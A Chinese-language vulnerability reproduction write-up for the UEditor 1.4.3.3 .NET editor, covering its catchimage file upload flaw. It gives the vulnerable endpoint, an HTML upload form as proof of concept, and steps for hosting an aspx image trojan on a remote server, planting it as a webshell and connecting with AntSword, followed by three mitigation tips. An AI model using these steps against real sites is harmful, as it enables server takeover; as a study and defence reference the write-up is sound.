UEditor上传漏洞复现

UEditor编辑器介绍

UEditor是由百度web前端研发部开发所见即所得富文本web编辑器，具有轻量，可定制，注重用户体验等特点，开源基于MIT协议，允许*使用和修改代码。

漏洞影响版本

漏洞影响版本：1.4.3.3（.net),其他php,jsp,asp版本不受此UEditor的漏洞的影响。

最新版本为1.4.3.3，并且已经不支持更新了。

漏洞复现过程

1.漏洞地址：

http://xxxxxxxx/Manage/js/ueditor/net/controller.ashx?action=catchimage

访问后，返回下图，证明存在漏洞。

2.构造上传

<form action="http://xxxxxxxx/Manage/js/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">

 

 <p>shell addr: <input type="text" name="source[]" /></p>

  

 <input type="submit" value="Submit" />

  

</form>

3.制作aspx一句话图片木马

4.将木马FTP上传至远程云服务器：ftp://xx.xx.xx.xx/

 

5.通过python启动http服务，python -m http.server 8989

6.云服务器木马地址：

http://xx.xx.xx.xx:8989/111.jpg

7.访问poc.html，输入云服务器一句话图片木马地址，点sumbit，上传木马成功。

 

 

8.木马地址

http://xxxxxx/Manage/js/ueditor/net/upload/image/20201112/6374077383629687503565050.aspx

9.蚁剑连接木马，拿到webshell。

漏洞防范

1.目前临时的漏洞修复是建议，把文件上传目录设置无脚本执行权限，uploadvideo、uploadimage、catchimage、uploadscrawl、uploadfile、等等目录都设置为无脚本权限。

2.在百度UEditor官方没有出补丁前，设置图片目录为只读，禁止写入。

3.修改程序的源代码，对crawlerhandler源文件进行文件上传格式的严格过滤与判断。